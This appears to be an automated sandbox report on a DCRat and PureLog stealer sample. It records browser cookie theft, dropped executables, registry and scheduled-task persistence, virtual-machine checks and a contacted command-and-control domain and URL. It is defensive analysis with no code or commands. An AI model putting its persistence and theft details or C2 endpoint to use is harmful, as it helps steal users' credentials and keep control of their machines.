                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies-journal
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-wal

                            Remote Access Functionality

                            barindex
                            Yara detected DCRat
                            Source: Yara matchFile source: 00000000.00000002.2374859245.0000000012E9A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: 9XHFe6y4Dj.exe PID: 6400, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: 9XHFe6y4Dj.exe PID: 8812, type: MEMORYSTR
                            Yara detected PureLog Stealer
                            Source: Yara matchFile source: 9XHFe6y4Dj.exe, type: SAMPLE
                            Source: Yara matchFile source: 0.0.9XHFe6y4Dj.exe.680000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000000.00000000.2087739498.0000000000682000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                            Source: Yara matchFile source: C:\Program Files (x86)\Windows Mail\tqeRXJHxPWPPoiNqjJeEYdv.exe, type: DROPPED
                            Yara detected zgRAT
                            Source: Yara matchFile source: 9XHFe6y4Dj.exe, type: SAMPLE
                            Source: Yara matchFile source: 0.0.9XHFe6y4Dj.exe.680000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: C:\Program Files (x86)\Windows Mail\tqeRXJHxPWPPoiNqjJeEYdv.exe, type: DROPPED

                            Mitre Att&ck Matrix

                            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                            Gather Victim Identity Information1
                            Scripting                            		Valid Accounts241
                            Windows Management Instrumentation                            		1
                            Scripting                            		1
                            DLL Side-Loading                            		11
                            Disable or Modify Tools                            		1
                            OS Credential Dumping                            		2
                            File and Directory Discovery                            		1
                            Taint Shared Content                            		11
                            Archive Collected Data                            		1
                            Encrypted Channel                            		Exfiltration Over Other Network MediumAbuse Accessibility Features
                            CredentialsDomainsDefault Accounts1
                            Scheduled Task/Job                            		1
                            DLL Side-Loading                            		11
                            Process Injection                            		1
                            Deobfuscate/Decode Files or Information                            		LSASS Memory144
                            System Information Discovery                            		Remote Desktop Protocol1
                            Data from Local System                            		2
                            Non-Application Layer Protocol                            		Exfiltration Over BluetoothNetwork Denial of Service
                            Email AddressesDNS ServerDomain AccountsAt1
                            Scheduled Task/Job                            		1
                            Scheduled Task/Job                            		1
                            Obfuscated Files or Information                            		Security Account Manager341
                            Security Software Discovery                            		SMB/Windows Admin Shares1
                            Clipboard Data                            		12
                            Application Layer Protocol                            		Automated ExfiltrationData Encrypted for Impact
                            Employee NamesVirtual Private ServerLocal AccountsCron31
                            Registry Run Keys / Startup Folder                            		31
                            Registry Run Keys / Startup Folder                            		1
                            Software Packing                            		NTDS1
                            Process Discovery                            		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
                            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                            DLL Side-Loading                            		LSA Secrets261
                            Virtualization/Sandbox Evasion                            		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                            File Deletion                            		Cached Domain Credentials1
                            Application Window Discovery                            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items133
                            Masquerading                            		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job261
                            Virtualization/Sandbox Evasion                            		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt11
                            Process Injection                            		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                            Behavior Graph

                            Hide Legend

                            Legend:

                            • Process
                            • Signature
                            • Created File
                            • DNS/IP Info
                            • Is Dropped
                            • Is Windows Process
                            • Number of created Registry Values
                            • Number of created Files
                            • Visual Basic
                            • Delphi
                            • Java
                            • .Net C# or VB.NET
                            • C, C++ or other language
                            • Is malicious
                            • Internet
                            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1538177 Sample: 9XHFe6y4Dj.exe Startdate: 20/10/2024 Architecture: WINDOWS Score: 100 67 733812cm.n9shteam.in 2->67 73 Suricata IDS alerts for network traffic 2->73 75 Found malware configuration 2->75 77 Antivirus detection for dropped file 2->77 79 14 other signatures 2->79 8 9XHFe6y4Dj.exe 6 54 2->8         started        12 tqeRXJHxPWPPoiNqjJeEYdv.exe 2->12         started        15 svchost.exe 2->15         started        17 8 other processes 2->17 signatures3 process4 dnsIp5 51 C:\Windows\...\tqeRXJHxPWPPoiNqjJeEYdv.exe, PE32 8->51 dropped 53 C:\Users\user\Desktop\zKTiJdVm.log, PE32 8->53 dropped 55 C:\Users\user\Desktop\wQQSSdrw.log, PE32 8->55 dropped 63 27 other malicious files 8->63 dropped 85 Creates an undocumented autostart registry key 8->85 87 Creates multiple autostart registry keys 8->87 89 Creates an autostart registry key pointing to binary in C:\Windows 8->89 99 3 other signatures 8->99 19 csc.exe 4 8->19         started        23 csc.exe 4 8->23         started        25 powershell.exe 8->25         started        27 19 other processes 8->27 69 733812cm.n9shteam.in 188.114.96.3, 49772, 49782, 49784 CLOUDFLARENETUS European Union 12->69 57 C:\Users\user\Desktop\yHSRySXa.log, PE32 12->57 dropped 59 C:\Users\user\Desktop\xYZkNoRc.log, PE32 12->59 dropped 61 C:\Users\user\Desktop\vWmBrFMh.log, PE32 12->61 dropped 65 19 other malicious files 12->65 dropped 91 Multi AV Scanner detection for dropped file 12->91 93 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 12->93 95 Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines) 12->95 97 Tries to harvest and steal browser information (history, passwords, etc) 12->97 71 127.0.0.1 unknown unknown 15->71 file6 signatures7 process8 file9 47 C:\Program Files (x86)\...\msedge.exe, PE32 19->47 dropped 81 Infects executable files (exe, dll, sys, html) 19->81 29 conhost.exe 19->29         started        31 cvtres.exe 1 19->31         started        49 C:\Windows\...\SecurityHealthSystray.exe, PE32 23->49 dropped 33 conhost.exe 23->33         started        35 cvtres.exe 1 23->35         started        83 Loading BitLocker PowerShell Module 25->83 43 2 other processes 25->43 37 conhost.exe 27->37         started        39 conhost.exe 27->39         started        41 conhost.exe 27->41         started        45 18 other processes 27->45 signatures10 process11

                            Screenshots

                            Thumbnails

                            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                            windows-stand

                            Antivirus, Machine Learning and Genetic Malware Detection

                            Initial Sample

                            SourceDetectionScannerLabelLink
                            9XHFe6y4Dj.exe66%ReversingLabsByteCode-MSIL.Trojan.DCRat
                            9XHFe6y4Dj.exe100%AviraHEUR/AGEN.1339906
                            9XHFe6y4Dj.exe100%Joe Sandbox ML

                            Dropped Files

                            SourceDetectionScannerLabelLink
                            C:\Program Files (x86)\Windows Mail\tqeRXJHxPWPPoiNqjJeEYdv.exe100%AviraHEUR/AGEN.1339906
                            C:\Program Files (x86)\Windows Mail\tqeRXJHxPWPPoiNqjJeEYdv.exe100%AviraHEUR/AGEN.1339906
                            C:\Program Files (x86)\Windows Mail\tqeRXJHxPWPPoiNqjJeEYdv.exe100%AviraHEUR/AGEN.1339906
                            C:\Program Files (x86)\Windows Mail\tqeRXJHxPWPPoiNqjJeEYdv.exe100%Joe Sandbox ML
                            C:\Program Files (x86)\Windows Mail\tqeRXJHxPWPPoiNqjJeEYdv.exe100%Joe Sandbox ML
                            C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe100%Joe Sandbox ML
                            C:\Program Files (x86)\Windows Mail\tqeRXJHxPWPPoiNqjJeEYdv.exe100%Joe Sandbox ML
                            C:\Program Files (x86)\Windows Mail\tqeRXJHxPWPPoiNqjJeEYdv.exe66%ReversingLabsByteCode-MSIL.Trojan.DCRat
                            C:\Program Files\Uninstall Information\tqeRXJHxPWPPoiNqjJeEYdv.exe66%ReversingLabsByteCode-MSIL.Trojan.DCRat
                            C:\Program Files\Windows Defender\Platform\tqeRXJHxPWPPoiNqjJeEYdv.exe66%ReversingLabsByteCode-MSIL.Trojan.DCRat
                            C:\Users\user\Desktop\AKEAUBbV.log8%ReversingLabs
                            C:\Users\user\Desktop\BQsBwRkl.log17%ReversingLabs
                            C:\Users\user\Desktop\FcMrvptI.log29%ReversingLabsByteCode-MSIL.Trojan.Generic
                            C:\Users\user\Desktop\GrAQXWWY.log17%ReversingLabs
                            C:\Users\user\Desktop\GzkiCFwe.log29%ReversingLabs
                            C:\Users\user\Desktop\HobYtWlT.log13%ReversingLabsByteCode-MSIL.Trojan.Generic
                            C:\Users\user\Desktop\HyVANeDN.log8%ReversingLabs
                            C:\Users\user\Desktop\JTIguxNU.log17%ReversingLabs
                            C:\Users\user\Desktop\JVSqkWFI.log12%ReversingLabs
                            C:\Users\user\Desktop\LeSOATlM.log8%ReversingLabs
                            C:\Users\user\Desktop\LmCheCMS.log8%ReversingLabs
                            C:\Users\user\Desktop\MlnyqaSB.log21%ReversingLabsByteCode-MSIL.Trojan.Generic
                            C:\Users\user\Desktop\OXbzuEDs.log17%ReversingLabsByteCode-MSIL.Trojan.Whispergate
                            C:\Users\user\Desktop\OoZhLKXw.log21%ReversingLabs
                            C:\Users\user\Desktop\PNvPNCKx.log17%ReversingLabsByteCode-MSIL.Trojan.DCRat
                            C:\Users\user\Desktop\QZUgHzbG.log21%ReversingLabsByteCode-MSIL.Trojan.Generic
                            C:\Users\user\Desktop\RORqBBDl.log21%ReversingLabs
                            C:\Users\user\Desktop\ScGOdifB.log12%ReversingLabs
                            C:\Users\user\Desktop\TQKWOvbz.log17%ReversingLabsByteCode-MSIL.Trojan.DCRat
                            C:\Users\user\Desktop\VNlekvqu.log21%ReversingLabs
                            C:\Users\user\Desktop\XPYNFevp.log17%ReversingLabsByteCode-MSIL.Trojan.Whispergate
                            C:\Users\user\Desktop\XjppJZgg.log13%ReversingLabsByteCode-MSIL.Trojan.Generic
                            C:\Users\user\Desktop\ZInvrbgn.log21%ReversingLabs
                            C:\Users\user\Desktop\aZffRVgZ.log50%ReversingLabsByteCode-MSIL.Trojan.Generic
                            C:\Users\user\Desktop\bIYNCAnX.log17%ReversingLabs
                            C:\Users\user\Desktop\cmFWEbPY.log71%ReversingLabsByteCode-MSIL.Trojan.DCRat
                            C:\Users\user\Desktop\fXkmLoaR.log29%ReversingLabs
                            C:\Users\user\Desktop\ftgCpYKW.log8%ReversingLabs
                            C:\Users\user\Desktop\ioFvQtnJ.log9%ReversingLabs
                            C:\Users\user\Desktop\jrGLbElV.log8%ReversingLabs
                            C:\Users\user\Desktop\koiTwEAQ.log50%ReversingLabsByteCode-MSIL.Trojan.Generic
                            C:\Users\user\Desktop\mcmciRwO.log12%ReversingLabs
                            C:\Users\user\Desktop\oXLUJmZB.log8%ReversingLabs
                            C:\Users\user\Desktop\ohiUtZsx.log21%ReversingLabs
                            C:\Users\user\Desktop\pSWUxCdp.log8%ReversingLabs
                            C:\Users\user\Desktop\pkjlEjqK.log5%ReversingLabs
                            C:\Users\user\Desktop\qhLtZjFE.log21%ReversingLabs
                            C:\Users\user\Desktop\taabLgrD.log9%ReversingLabs
                            C:\Users\user\Desktop\vWmBrFMh.log8%ReversingLabs
                            C:\Users\user\Desktop\vcMKgPvy.log8%ReversingLabs
                            C:\Users\user\Desktop\wQQSSdrw.log71%ReversingLabsByteCode-MSIL.Trojan.DCRat
                            C:\Users\user\Desktop\xYZkNoRc.log12%ReversingLabs
                            C:\Users\user\Desktop\yHSRySXa.log5%ReversingLabs
                            C:\Users\user\Desktop\zKTiJdVm.log29%ReversingLabsByteCode-MSIL.Trojan.Generic
                            C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe66%ReversingLabsByteCode-MSIL.Trojan.DCRat

                            Unpacked PE Files

                            No Antivirus matches

                            Domains

                            No Antivirus matches

                            URLs

                            SourceDetectionScannerLabelLink
                            https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
                            https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
                            https://g.live.com/odclientsettings/Prod/C:0%URL Reputationsafe
                            https://duckduckgo.com/ac/?q=0%URL Reputationsafe
                            http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
                            http://schemas.xmlsoap.org/soap/encoding/0%URL Reputationsafe
                            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
                            http://schemas.xmlsoap.org/wsdl/0%URL Reputationsafe
                            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%URL Reputationsafe
                            https://g.live.com/odclientsettings/ProdV2.C:0%URL Reputationsafe
                            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
                            https://aka.ms/pscore680%URL Reputationsafe
                            https://www.ecosia.org/newtab/0%URL Reputationsafe
                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe

                            Domains and IPs

                            Contacted Domains

                            NameIPActiveMaliciousAntivirus DetectionReputation
                            733812cm.n9shteam.in
                            		188.114.96.3
                            		truetrue
                              		unknown

                              Contacted URLs

                              NameMaliciousAntivirus DetectionReputation
                              http://733812cm.n9shteam.in/DefaultWordpress.phptrue
                                		unknown

                                URLs from Memory and Binaries

                                NameSourceMaliciousAntivirus DetectionReputation
                                https://ac.ecosia.org/autocomplete?q=CpvYgJX57w.71.drfalse
                                • URL Reputation: safe
                                		unknown
                                https://duckduckgo.com/chrome_newtabCpvYgJX57w.71.drfalse
                                • URL Reputation: safe
                                		unknown
                                https://g.live.com/odclientsettings/Prod/C:svchost.exe, 0000004C.00000003.2526789075.0000021257EB3000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.76.drfalse
                                • URL Reputation: safe
                                		unknown
                                https://duckduckgo.com/ac/?q=CpvYgJX57w.71.drfalse
                                • URL Reputation: safe
                                		unknown
                                https://www.google.com/images/branding/product/ico/googleg_lodp.icoCpvYgJX57w.71.drfalse
                                  		unknown
                                  http://pesterbdd.com/images/Pester.pngpowershell.exe, 0000003A.00000002.2532930732.000001B900228000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 0000001C.00000002.2703365536.0000015704276000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2497719387.0000026F80228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.2638394745.000002C734B61000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.2631300752.0000018E4E556000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2616194889.000001F202703000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.2509066304.0000021740B17000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.2616044950.0000019064065000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.2632781109.000002D29E2C6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.2535836982.000002579CF48000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002D.00000002.2626345528.0000012CC0988000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002F.00000002.2522252537.000001FC00226000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000031.00000002.2557930328.00000120003A7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000032.00000002.2601962440.000002223CA98000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000033.00000002.2573932812.000001C784368000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000034.00000002.2712814491.0000011152778000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000036.00000002.2643318027.000001D331C48000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000038.00000002.2590359889.000001FF24DC5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003A.00000002.2532930732.000001B900228000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 0000003A.00000002.2532930732.000001B900228000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		unknown
                                    https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchCpvYgJX57w.71.drfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://schemas.xmlsoap.org/wsdl/powershell.exe, 0000001C.00000002.2703365536.0000015704276000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2497719387.0000026F80228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.2638394745.000002C734B61000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.2631300752.0000018E4E556000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2616194889.000001F202703000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.2509066304.0000021740B17000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.2616044950.0000019064065000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.2632781109.000002D29E2C6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.2535836982.000002579CF48000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002D.00000002.2626345528.0000012CC0988000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002F.00000002.2522252537.000001FC00226000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000031.00000002.2557930328.00000120003A7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000032.00000002.2601962440.000002223CA98000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000033.00000002.2573932812.000001C784368000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000034.00000002.2712814491.0000011152778000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000036.00000002.2643318027.000001D331C48000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000038.00000002.2590359889.000001FF24DC5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003A.00000002.2532930732.000001B900228000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=CpvYgJX57w.71.drfalse
                                    • URL Reputation: safe
                                    		unknown
                                    https://g.live.com/odclientsettings/ProdV2.C:svchost.exe, 0000004C.00000003.2526789075.0000021257E40000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.76.drfalse
                                    • URL Reputation: safe
                                    		unknown
                                    https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=CpvYgJX57w.71.drfalse
                                    • URL Reputation: safe
                                    		unknown
                                    https://aka.ms/pscore68powershell.exe, 0000001C.00000002.2703365536.0000015703F91000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2497719387.0000026F80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.2638394745.000002C7347B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.2631300752.0000018E4E331000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2616194889.000001F2023D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.2509066304.00000217408F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.2616044950.0000019063E41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.2632781109.000002D29E0A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.2535836982.000002579CD21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002D.00000002.2626345528.0000012CC0761000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002F.00000002.2522252537.000001FC00001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000031.00000002.2557930328.0000012000181000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000032.00000002.2601962440.000002223C871000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000033.00000002.2573932812.000001C784141000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000034.00000002.2712814491.0000011152551000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000036.00000002.2643318027.000001D331A21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000038.00000002.2590359889.000001FF24B31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003A.00000002.2532930732.000001B900001000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    https://www.ecosia.org/newtab/CpvYgJX57w.71.drfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name9XHFe6y4Dj.exe, 00000000.00000002.2210751988.000000000351C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2703365536.0000015703F91000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2497719387.0000026F80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.2638394745.000002C7347B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.2631300752.0000018E4E331000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2616194889.000001F2023D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.2509066304.00000217408F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.2616044950.0000019063E41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.2632781109.000002D29E0A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.2535836982.000002579CD21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002D.00000002.2626345528.0000012CC0761000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002F.00000002.2522252537.000001FC00001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000031.00000002.2557930328.0000012000181000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000032.00000002.2601962440.000002223C871000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000033.00000002.2573932812.000001C784141000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000034.00000002.2712814491.0000011152551000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000036.00000002.2643318027.000001D331A21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000038.00000002.2590359889.000001FF24B31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003A.00000002.2532930732.000001B900001000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=CpvYgJX57w.71.drfalse
                                    • URL Reputation: safe
                                    		unknown
                                    https://github.com/Pester/Pesterpowershell.exe, 0000003A.00000002.2532930732.000001B900228000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		unknown

                                      World Map of Contacted IPs

                                      • No. of IPs < 25%
                                      • 25% < No. of IPs < 50%
                                      • 50% < No. of IPs < 75%
                                      • 75% < No. of IPs

                                      Public IPs

                                      IPDomainCountryFlagASNASN NameMalicious
                                      188.114.96.3
                                      		733812cm.n9shteam.inEuropean Union
                                      		13335CLOUDFLARENETUStrue

                                      Private

                                      IP
                                      127.0.0.1

                                      General Information

                                      Joe Sandbox version:41.0.0 Charoite
                                      Analysis ID:1538177
                                      Start date and time:2024-10-20 18:16:15 +02:00
                                      Joe Sandbox product:CloudBasic
                                      Overall analysis duration:0h 12m 17s
                                      Hypervisor based Inspection enabled:false
                                      Report type:full
                                      Cookbook file name:default.jbs
                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                      Number of analysed new started processes analysed:80
                                      Number of new started drivers analysed:0
                                      Number of existing processes analysed:0
                                      Number of existing drivers analysed:0
                                      Number of injected processes analysed:0
                                      Technologies:
                                      • HCA enabled
                                      • EGA enabled
                                      • AMSI enabled
                                      Analysis Mode:default
                                      Analysis stop reason:Timeout
                                      Sample name:9XHFe6y4Dj.exe
                                      renamed because original name is a hash value
                                      Original Sample Name:8213A9C837181823A4D58728637EAEB5.exe
                                      Detection:MAL
                                      Classification:mal100.spre.troj.spyw.expl.evad.winEXE@86/167@1/2
                                      EGA Information:Failed
                                      HCA Information:Failed
                                      Cookbook Comments:
                                      • Found application associated with file extension: .exe

                                      Warnings

                                      • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, schtasks.exe
                                      • Excluded IPs from analysis (whitelisted): 184.28.90.27
                                      • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, e16604.g.akamaiedge.net, ctldl.windowsupdate.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com
                                      • Execution Graph export aborted for target 9XHFe6y4Dj.exe, PID 3372 because it is empty
                                      • Execution Graph export aborted for target 9XHFe6y4Dj.exe, PID 5160 because it is empty
                                      • Execution Graph export aborted for target 9XHFe6y4Dj.exe, PID 6400 because it is empty
                                      • Execution Graph export aborted for target 9XHFe6y4Dj.exe, PID 8812 because it is empty
                                      • Execution Graph export aborted for target tqeRXJHxPWPPoiNqjJeEYdv.exe, PID 7484 because it is empty
                                      • Not all processes where analyzed, report is missing behavior information
                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                      • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                      • Report size getting too big, too many NtCreateKey calls found.
                                      • Report size getting too big, too many NtOpenFile calls found.
                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                      • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                      • VT rate limit hit for: 9XHFe6y4Dj.exe

                                      Simulations

                                      Behavior and APIs

                                      TimeTypeDescription
                                      12:17:27API Interceptor398x Sleep call for process: powershell.exe modified
                                      12:17:54API Interceptor2174951x Sleep call for process: tqeRXJHxPWPPoiNqjJeEYdv.exe modified
                                      12:17:56API Interceptor2x Sleep call for process: svchost.exe modified
                                      18:17:20Task SchedulerRun new task: tqeRXJHxPWPPoiNqjJeEYdv path: "C:\Program Files (x86)\windows mail\tqeRXJHxPWPPoiNqjJeEYdv.exe"
                                      18:17:20Task SchedulerRun new task: tqeRXJHxPWPPoiNqjJeEYdvt path: "C:\Program Files (x86)\windows mail\tqeRXJHxPWPPoiNqjJeEYdv.exe"
                                      18:17:22AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run tqeRXJHxPWPPoiNqjJeEYdv "C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe"
                                      18:17:23Task SchedulerRun new task: 9XHFe6y4Dj path: "C:\Users\user\Desktop\9XHFe6y4Dj.exe"
                                      18:17:24Task SchedulerRun new task: 9XHFe6y4Dj9 path: "C:\Users\user\Desktop\9XHFe6y4Dj.exe"
                                      18:17:35AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run 9XHFe6y4Dj "C:\Users\user\Desktop\9XHFe6y4Dj.exe"
                                      18:17:49AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run tqeRXJHxPWPPoiNqjJeEYdv "C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe"
                                      18:17:59AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run 9XHFe6y4Dj "C:\Users\user\Desktop\9XHFe6y4Dj.exe"
                                      18:18:08AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run tqeRXJHxPWPPoiNqjJeEYdv "C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe"
                                      18:18:17AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run 9XHFe6y4Dj "C:\Users\user\Desktop\9XHFe6y4Dj.exe"
                                      18:18:34AutostartRun: WinLogon Shell "C:\Program Files (x86)\windows mail\tqeRXJHxPWPPoiNqjJeEYdv.exe"
                                      18:18:43AutostartRun: WinLogon Shell "C:\Program Files\Uninstall Information\tqeRXJHxPWPPoiNqjJeEYdv.exe"
